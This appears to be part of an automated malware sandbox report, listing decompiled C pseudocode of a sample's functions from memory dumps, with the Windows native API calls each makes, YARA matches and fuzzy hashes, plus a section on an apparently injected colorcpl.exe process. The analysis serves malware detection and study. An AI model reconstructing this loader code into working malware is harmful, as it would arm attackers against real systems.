				asm("sahf");
				_pop(es);
				if(__eflags != 0) {
					 *_t20 =  *_t20 + _t20;
					return  *((intOrPtr*)( *_t28))( *((intOrPtr*)(_t30 + 0xc)),  *((intOrPtr*)(_t30 + 0x10)),  *((intOrPtr*)(_t30 + 0x14)),  *((intOrPtr*)(_t30 + 0x18)),  *((intOrPtr*)(_t30 + 0x1c)));
				} else {
					__eflags =  *0x8bec8b55 - 0x45;
					__ebp = __esp;
					__eax =  *(__ebp + 8);
					_t8 = __eax + 0xc40; // 0xc40
					__esi = _t8;
					 *(__ebp + 0x30) =  *(__ebp + 0x24);
					 *(__ebp + 0x18) =  *(__ebp + 0xc);
					__eax = NtCreateFile( *(__ebp + 0xc),  *(__ebp + 0x10),  *(__ebp + 0x14),  *(__ebp + 0x18),  *(__ebp + 0x1c),  *(__ebp + 0x20),  *(__ebp + 0x24),  *(__ebp + 0x28),  *(__ebp + 0x2c),  *(__ebp + 0x30),  *(__ebp + 0x34)); // executed
					__esi = __esi;
					__ebp = __ebp;
					return __eax;
				}
			}








                                                                                                                                0x004185aa
                                                                                                                                0x004185ab
                                                                                                                                0x004185ac
                                                                                                                                0x0041858a
                                                                                                                                0x004185a9
                                                                                                                                0x004185ae
                                                                                                                                0x004185ae
                                                                                                                                0x004185b1
                                                                                                                                0x004185b3
                                                                                                                                0x004185bf
                                                                                                                                0x004185bf
                                                                                                                                0x004185dd
                                                                                                                                0x004185f5
                                                                                                                                0x004185fd
                                                                                                                                0x004185ff
                                                                                                                                0x00418600
                                                                                                                                0x00418601
                                                                                                                                0x00418601

                                                                                                                                APIs
                                                                                                                                • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 004185FD
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.779648624.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateFile
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 823142352-0
                                                                                                                                • Opcode ID: dc0d4a1cb146be4e316391fb8bf4bf26ae46e39fd8a942a30fc6ca6eec88aa7f
                                                                                                                                • Instruction ID: 2e2d811b246b4735c453300190063c568e9394bbeb903fe58df2885e91e37381
                                                                                                                                • Opcode Fuzzy Hash: dc0d4a1cb146be4e316391fb8bf4bf26ae46e39fd8a942a30fc6ca6eec88aa7f
                                                                                                                                • Instruction Fuzzy Hash: 1B11F7B2204149AFCB08CF98DC94CEB77A9EF8C314B14864EFA0DD3202D634E851CBA4
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00409B30, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 100%
                                                                                                                                			E00409B30(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041AF40( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041B360(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B5E0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E004196F0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                                                                                                0x00409b4c
                                                                                                                                0x00409b4f
                                                                                                                                0x00409b54
                                                                                                                                0x00409b59
                                                                                                                                0x00409b63
                                                                                                                                0x00409b68
                                                                                                                                0x00409b6b
                                                                                                                                0x00409b6d
                                                                                                                                0x00409b75
                                                                                                                                0x00409b7a
                                                                                                                                0x00409b7a
                                                                                                                                0x00409b81
                                                                                                                                0x00409b89
                                                                                                                                0x00409b8c
                                                                                                                                0x00409b8e
                                                                                                                                0x00409ba2
                                                                                                                                0x00000000
                                                                                                                                0x00409ba4
                                                                                                                                0x00409baa
                                                                                                                                0x00409b5e
                                                                                                                                0x00409b5e
                                                                                                                                0x00409b5e

                                                                                                                                APIs
                                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BA2
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.779648624.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: Load
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2234796835-0
                                                                                                                                • Opcode ID: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
                                                                                                                                • Instruction ID: f32d3288474e01bdfe8324a51b674010449bcf15fd3c95856a6e0addd4ed2bba
                                                                                                                                • Opcode Fuzzy Hash: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
                                                                                                                                • Instruction Fuzzy Hash: 490112B5D0010DA7DF10EBA5DC42FDEB778AB54308F0041A6E918A7281F675EB54C795
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 004185B0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 100%
                                                                                                                                			E004185B0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E004191B0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                                                                                                0x004185bf
                                                                                                                                0x004185c7
                                                                                                                                0x004185fd
                                                                                                                                0x00418601

                                                                                                                                APIs
                                                                                                                                • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 004185FD
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.779648624.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateFile
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 823142352-0
                                                                                                                                • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                • Instruction ID: 5d6b5cde0bcb09b7c0358823ed137c5ed8f79ffe5ada1a139c779eb2a876d5e3
                                                                                                                                • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                • Instruction Fuzzy Hash: 00F0B2B2200208ABCB08CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0041878D, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 58%
                                                                                                                                			E0041878D(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				0x8b96ca9e();
				_t10 = _a4;
				_t3 = _t10 + 0xc60; // 0xca0
				E004191B0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                                                                                                0x0041878d
                                                                                                                                0x00418793
                                                                                                                                0x0041879f
                                                                                                                                0x004187a7
                                                                                                                                0x004187c9
                                                                                                                                0x004187cd

                                                                                                                                APIs
                                                                                                                                • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00419384,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004187C9
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.779648624.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2167126740-0
                                                                                                                                • Opcode ID: 9a28c4c10d4c68fc9d9385e7ed565ca99d27c4751ffea4b0f2203834e8defee7
                                                                                                                                • Instruction ID: db40a58b76d6b29672a74dece520db692e5e4b0798d03292ab09de1ccffb3d24
                                                                                                                                • Opcode Fuzzy Hash: 9a28c4c10d4c68fc9d9385e7ed565ca99d27c4751ffea4b0f2203834e8defee7
                                                                                                                                • Instruction Fuzzy Hash: 25F01CB1210109AFDB14DF99CC81EEB77A9AF88364F158649FA1997291C630E851CBA4
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00418790, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 100%
                                                                                                                                			E00418790(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E004191B0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                                                                                                0x0041879f
                                                                                                                                0x004187a7
                                                                                                                                0x004187c9
                                                                                                                                0x004187cd

                                                                                                                                APIs
                                                                                                                                • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00419384,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004187C9
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.779648624.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2167126740-0
                                                                                                                                • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                • Instruction ID: dde6359f0c5cf0f3b7cc61d53361d99b03a052e7ad6e115d9fdbfc5a6ee34577
                                                                                                                                • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                • Instruction Fuzzy Hash: C2F015B2200208ABDB14DF89CC81EEB77ADAF88754F158149FE0997241C630F810CBE4
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 004186E0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 100%
                                                                                                                                			E004186E0(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409753
				E004191B0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                                                                                                                0x004186e3
                                                                                                                                0x004186e6
                                                                                                                                0x004186ef
                                                                                                                                0x004186f7
                                                                                                                                0x00418705
                                                                                                                                0x00418709

                                                                                                                                APIs
                                                                                                                                • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418705
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.779648624.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: Close
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3535843008-0
                                                                                                                                • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                • Instruction ID: cde372c9834ecde76929cfdbc6e84a5308d085747d856cc7173a1988eed98478
                                                                                                                                • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                • Instruction Fuzzy Hash: 23D012752002147BD710EB99CC45ED7776DEF44750F154459BA195B242C530F94086E4
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 004186DF, Relevance: 1.5, APIs: 1, Instructions: 17nativeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 100%
                                                                                                                                			E004186DF(intOrPtr _a4, void* _a8) {
				long _t8;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409753
				E004191B0(0x8bec8b55, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}




                                                                                                                                0x004186e3
                                                                                                                                0x004186e6
                                                                                                                                0x004186ef
                                                                                                                                0x004186f7
                                                                                                                                0x00418705
                                                                                                                                0x00418709

                                                                                                                                APIs
                                                                                                                                • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418705
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.779648624.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: Close
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3535843008-0
                                                                                                                                • Opcode ID: d9487943414440ffb89e1ce760500a6a2a88c1ab729aa32b855afae80cdef43e
                                                                                                                                • Instruction ID: aef43a0afe257eae68542e9ced079970e1acd9ba06f131b4c2551752298f5f80
                                                                                                                                • Opcode Fuzzy Hash: d9487943414440ffb89e1ce760500a6a2a88c1ab729aa32b855afae80cdef43e
                                                                                                                                • Instruction Fuzzy Hash: ACD097AE00D2C00FCB10EBB468D10C37F40EE802283280ECFE4A807303C238D60A93E0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 004088C0, Relevance: .1, Instructions: 92COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.779648624.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 299515b6a4c4b7fe34a0254a828e2e35bbff23895406936d62d23753fc4f2dc5
                                                                                                                                • Instruction ID: 2d85129770ae1569db338c81f9331519a7dd6e0895954f6df8c699ab0d1d1ce1
                                                                                                                                • Opcode Fuzzy Hash: 299515b6a4c4b7fe34a0254a828e2e35bbff23895406936d62d23753fc4f2dc5
                                                                                                                                • Instruction Fuzzy Hash: C5212BB2C442085BCB11E6609D42BFF736C9B14304F04017FE989A3181FA38AB498BA7
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00418880, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 100%
                                                                                                                                			E00418880(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E004191B0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x413526
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}





                                                                                                                                0x00418897
                                                                                                                                0x004188a2
                                                                                                                                0x004188ad
                                                                                                                                0x004188b1

                                                                                                                                APIs
                                                                                                                                • RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004188AD
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.779648624.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocateHeap
                                                                                                                                • String ID: &5A
                                                                                                                                • API String ID: 1279760036-1617645808
                                                                                                                                • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                • Instruction ID: 4ef14f879dafae0d6951d5bd0a6bbd37283b7ec5dd2ccf2ca50cdce3f5cd3bdb
                                                                                                                                • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                • Instruction Fuzzy Hash: 6CE012B1200208ABDB14EF99CC45EA777ADAF88654F158559FA095B242CA30F910CAF4
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00407280, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 82%
                                                                                                                                			E00407280(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041A110( &_v67, 0, 0x3f);
				E0041ACF0( &_v68, 3);
				_t12 = E00409B30(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E40(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409290(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                                                                                                                                0x00407280
                                                                                                                                0x0040728f
                                                                                                                                0x00407293
                                                                                                                                0x0040729e
                                                                                                                                0x004072ae
                                                                                                                                0x004072be
                                                                                                                                0x004072c3
                                                                                                                                0x004072ca
                                                                                                                                0x004072cd
                                                                                                                                0x004072da
                                                                                                                                0x004072dc
                                                                                                                                0x004072de
                                                                                                                                0x004072fb
                                                                                                                                0x004072fb
                                                                                                                                0x00000000
                                                                                                                                0x004072fd
                                                                                                                                0x00407302

                                                                                                                                APIs
                                                                                                                                • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.779648624.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: MessagePostThread
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1836367815-0
                                                                                                                                • Opcode ID: 14624e8db26b89bccf1705d7108d041dc2e52ca21b332cab295bc8e658a3c696
                                                                                                                                • Instruction ID: 7737b7532069fc333edaf9b0832c3edc759e3be1fb1c5433828103526b109584
                                                                                                                                • Opcode Fuzzy Hash: 14624e8db26b89bccf1705d7108d041dc2e52ca21b332cab295bc8e658a3c696
                                                                                                                                • Instruction Fuzzy Hash: 36018431A8022876E721A6959C03FFE776C5B00B55F15416EFF04BA1C2E6A87A0546EA
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 004188F2, Relevance: 1.5, APIs: 1, Instructions: 45memoryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 004188ED
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.779648624.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: FreeHeap
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3298025750-0
                                                                                                                                • Opcode ID: dafc8c15e8a9e2114bf0b2238d302474ce2a3dc609ada96c66e59e2f03f3d90a
                                                                                                                                • Instruction ID: 9fe0fd86f7d7fa48f9665fef5f6d2483c7c308418335131a7015231e8cb9aa6a
                                                                                                                                • Opcode Fuzzy Hash: dafc8c15e8a9e2114bf0b2238d302474ce2a3dc609ada96c66e59e2f03f3d90a
                                                                                                                                • Instruction Fuzzy Hash: B2F03CB2214408ABDB04CF98EC80CFBB7ADEF8C254724874DF94C97104C634E8528BA0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 004188B4, Relevance: 1.5, APIs: 1, Instructions: 28memoryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 004188ED
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.779648624.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: FreeHeap
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3298025750-0
                                                                                                                                • Opcode ID: 3cc0ab27382f47137e21478b5881acfa34c0cceb2e64836e29a7beea267e559e
                                                                                                                                • Instruction ID: 3935d41014d8c1abdd02f7ae24e3ee98211f9d516e5be9058403c8d6c8ec255b
                                                                                                                                • Opcode Fuzzy Hash: 3cc0ab27382f47137e21478b5881acfa34c0cceb2e64836e29a7beea267e559e
                                                                                                                                • Instruction Fuzzy Hash: 56E06DB12002196BD715DF65CC09EA7776DEF49704F054299F9085B242C731E915CBF1
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 004188C0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 22%
                                                                                                                                			E004188C0(intOrPtr _a4, void* _a16) {
				void* _v3;
				intOrPtr _t5;
				void* _t6;
				char _t7;
				void* _t8;
				void* _t11;

				_t5 = _a4;
				_t8 =  *(_t5 + 0x10);
				_t3 = _t5 + 0xc74; // 0xc74
				_t6 = E004191B0(_t11, _t5, _t3, _t8, 0, 0x35);
				asm("adc al, 0x8b");
				asm("adc [ebx-0x3b7cf3b3], cl");
				asm("adc al, 0x52");
				_push(_t6);
				_t7 = RtlFreeHeap(_t8); // executed
				return _t7;
			}









                                                                                                                                0x004188c3
                                                                                                                                0x004188c6
                                                                                                                                0x004188cf
                                                                                                                                0x004188d7
                                                                                                                                0x004188de
                                                                                                                                0x004188e1
                                                                                                                                0x004188e7
                                                                                                                                0x004188eb
                                                                                                                                0x004188ed
                                                                                                                                0x004188f1

                                                                                                                                APIs
                                                                                                                                • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 004188ED
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.779648624.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: FreeHeap
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3298025750-0
                                                                                                                                • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                • Instruction ID: 8f9b7065ee004bfc107c5e1a3206d22b1dba8f53d1ba42c3d4a522b3320012f0
                                                                                                                                • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                • Instruction Fuzzy Hash: C0E012B1200208ABDB18EF99CC49EA777ADAF88750F018559FA095B242CA30E910CAF4
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00418A20, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 100%
                                                                                                                                			E00418A20(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E004191B0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                                                                                0x00418a3a
                                                                                                                                0x00418a50
                                                                                                                                0x00418a54

                                                                                                                                APIs
                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418A50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.779648624.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: LookupPrivilegeValue
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3899507212-0
                                                                                                                                • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                • Instruction ID: 62f155a2f2b834774e03dd9f5cc664d450e5ddbb18d5cf86998e13752e76a9ec
                                                                                                                                • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                • Instruction Fuzzy Hash: 6EE01AB12002086BDB10DF49CC85EE737ADAF88650F018155FA0957241CA34E8508BF5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00418900, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418928
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.779648624.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: ExitProcess
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 621844428-0
                                                                                                                                • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                • Instruction ID: 622c55a551f2a3710ca15f35a1068b8193fa72338b31a42c8a230178039be0f3
                                                                                                                                • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                • Instruction Fuzzy Hash: 3FD012716002147BD620DB99CC85FD777ACDF48750F058065BA1D5B241C531BA00C6E5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Non-executed Functions

                                                                                                                                Function 00406ABF, Relevance: .0, Instructions: 13COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.779648624.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 631079f6849d955786715ce8341a2691e10fd2d7e8a7bc7c598c0f69aa4a84f3
                                                                                                                                • Instruction ID: 01c2ba6592a0563243e45052ae10c4c36c9c1f3aeb80a1ebfe09ce9ee6c22793
                                                                                                                                • Opcode Fuzzy Hash: 631079f6849d955786715ce8341a2691e10fd2d7e8a7bc7c598c0f69aa4a84f3
                                                                                                                                • Instruction Fuzzy Hash: A4B09232E5A01802D024280C78802B0E3A89347224D1022A7EC18A36812482E851008C
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Analysis Process: colorcpl.exe PID: 6676 Parent PID: 3424 colorcpl.exeCOMMON

                                                                                                                                Executed Functions

                                                                                                                                Function 00CE85B0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • NtCreateFile.NTDLL(00000060,00000000,.z`,00CE3BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00CE3BA7,007A002E,00000000,00000060,00000000,00000000), ref: 00CE85FD
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.928514787.0000000000CD0000.00000040.00020000.sdmp, Offset: 00CD0000, based on PE: false
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateFile
                                                                                                                                • String ID: .z`
                                                                                                                                • API String ID: 823142352-1441809116
                                                                                                                                • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                • Instruction ID: b5d4b531f7ab259fc284cb2a6dd1310ba5edd7bdb7c262b8cf8217639bb735f6
                                                                                                                                • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
